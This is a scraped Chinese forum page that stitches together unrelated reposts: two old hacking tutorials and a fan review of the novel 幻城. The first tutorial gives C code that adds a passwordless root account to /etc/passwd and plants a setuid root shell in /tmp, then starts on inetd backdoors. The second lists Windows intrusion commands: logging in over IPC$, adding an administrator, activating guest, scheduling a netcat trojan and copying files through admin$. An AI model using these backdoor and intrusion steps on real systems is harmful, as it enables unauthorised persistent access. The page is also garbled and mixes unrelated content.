璐村惂鐢ㄦ埛_00a5777馃惥 -
关注数: 19 粉丝数: 3 发帖数: 32 关注贴吧数: 0
黑客技术 2 菜鸟后门技巧 副标题: 作者:佚名 文章来源:不详 点击数:634 更新时间:2005-9-18 本文的意旨是让你学会如何在完全控制系统后保留自己的根用户权限。这是黑客们非常热衷讨论的话题,但同时也应该是系统管理员们必须非常留意的。本文不可能列出所有的后门技巧,因为这些方法实在是太多了。但我会在文章中尽量解释那些通用的方法和技术。如果你作为(或者曾经作为)一名攻击者,花费了数周时间,才将一个帐号弄到手,但它的权限却实在可怜。这个系统据说非常安全,而你却希望能够更清楚地知道系统管理员究竟高明到什么程度。 于是你用尽了各种方法:IMAP、NIS、suid程序、错误的访问权限、进程竞争,等等,但仍然“不得其门而入”。最后,在一次偶然的情况下,你发现了系统管理员的一个小小失误,从而很快就获得了根用户权限。下一步要干什么呢?如何才能使你保留这个花费了如此长时间才完成的“艺术品”呢?[初级]最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。<++> backdoor/backdoor1.c#include main(){FILE *fd;fd=fopen("/etc/passwd","a+";fprintf(fd,"hax0r::0:0::/root:/bin/sh\n";}<-->比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)在 /tmp 目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。<++> backdoor/backdoor2.c#include main(){system("cp /bin/sh /tmp/fid";system("chown root.root /tmp/fid";system("chmod 4755 /tmp/fid";}<-->[中级]超级服务器守护进程(inetd)的配置文件。系统管理员一般情况下不经常检查该文件,因此这倒是个放置“后门”的好地方。 那么在这里如何建立一个最好的后门呢?当然是远程的了。这样你就不必需要本地帐号就可以成为根用户了。首先,让我们先来了解一下这方面的基础知识:inetd 进程负责监听各个TCP和UDP端口的连接请求,并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单,基本形式如下:(1) (2) (3) (4) (5) (6) (7)ftp stream tcp nowait root /usr/etc/ftpd ftpdtalk dgram udp wait root /usr/etc/ntalkd ntalkdmountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd1:第一栏是服务名称。服务名通过查询 /etc/services 文件(供 TCP 和 UDP 服务使用)或 portmap 守护进程(供 RPC 服务使用)映射成端口号。RPC(远程过程调用)服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。2:第二栏决定服务使用的套接口类型:stream、dgram 或 raw。一般说来,stream 用于 TCP 服务,dgram 用于 UDP, raw 的使用很少见。3:第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。4:如果所说明的服务一次可处理多个请求(而不是处理一个请求后就退出),那么第四栏应置成 wait,这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适,那么在本栏中填 nowait。
菜鸟必练入侵命令 黑客技术哦 菜鸟必练入侵命令 副标题: 作者:佚名 文章来源:不详 点击数:1130 更新时间:2005-9-28 1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。   net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina net命令果然强大啊! 2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\127.0.0.1 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321 ftp http://www.51.net 他会要求输入用户,成功后会要求输入密码.下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ get c:\index.htm d:\ 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 put c:\index.htm d:\ 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \\127.0.0.1\c$\index.htm ---------------------- 如果你要复制到D盘下把C改为D,就行了! copy index.htm \\127.0.0.1\d$\index.htm ---------------------- 如果你要把他复制到WINNT目录里 就要把输入 copy index.htm \\127.0.0.1\admin$\index.htm admin$是winnt ---------------------- 要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名
有谁看过幻城 读幻城有敢[转载] 酒红色的心 如影随形 读——《幻城》 [转载] zhanghanyun14:11 PM 卡索、樱空释、梨落、星旧、星轨、月神、岚裳、蝶澈、潮涯、迟墨、片风、剪瞳、离镜、罹天烬……幻雪帝国一群法力无边的人。   佛说,世界从生成到毁灭的一个过程为一劫,万劫就是万世。   世世轮回,永远无法逃脱命运的旋涡。   这样一群人,为自由而搏,为信仰而战。   这样一群人,为爱所羁绊,为情而束缚。爱情、亲情、友情,凡世间最可贵的三种情感,环行其间,串联起他们无法解开的绳索。   雪雾蒙眼的幻雪之城,纯粹明净的天空,火焰般眩目的红莲,暖春纷飞的落樱,灿烂如同朝阳的笑容,残酷又狂野的杀戮,如梦如幻,一一呈现眼前。   清晰的笔触,震撼人心的画面,摒弃尘世间的纷扰和喧嚣,飘逸清丽的世界,至诚至真的情愫。   如果说鬼鬼的《七月与安生》是至今看到的最唯美的漫画,那么四维的《幻城》就是最唯美的文字,一种久违的感动。   星旧:我的妹妹星轨是个善良而单纯的女孩子,会在我的怀抱里安静地睡觉,会等待我的归来,只是她已经死了,死在我的记忆里,她永远都不会再出现了。    星轨倒地前问星旧,你为什么不肯原谅我……   落泪,为星轨,也为所有人,为什么,每个善良的人都逃不过命运的劫难?   火族与冰族的圣战,无所谓正义与否,因为他们都为自由,为责任,为理想,为信仰。   白色是最亮眼夺目的,折射着我们每个人的身影,每个人的心灵,每个人的灵魂。   幻城,诡秘、奇异而又幸福。     “我总是看不清楚你的脸,你脸上沉沉的如同雾霭般的忧伤,你脸上的如同火焰般的乖戾,几百年,几千年,轮回转动,我在命运前匍匐了几世几代,我只想让你温暖,我只想让你自由。    如果可以和你在一起,我宁愿所有的星光全部陨落,因为你的眼睛,是我生命里,最亮的光芒。    凡世的喧嚣和明亮,世俗的快乐和幸福,如同清亮的溪涧,在风里,在我眼前,汩汩而过,温暖如同泉水一样涌出来,我没有奢望,我只要你快乐,不要哀伤。    风吹起花瓣如同破碎的流年,而你的笑容摇晃摇晃,成为我命途中最美的点缀,看天,看雪,看季节深深的暗影。”   空灵如风,流淌如水,温暖如春,飘舞如雪,纷飞如樱,火红如莲,璀璨如星,幸福如梦,如影随形。
1 下一页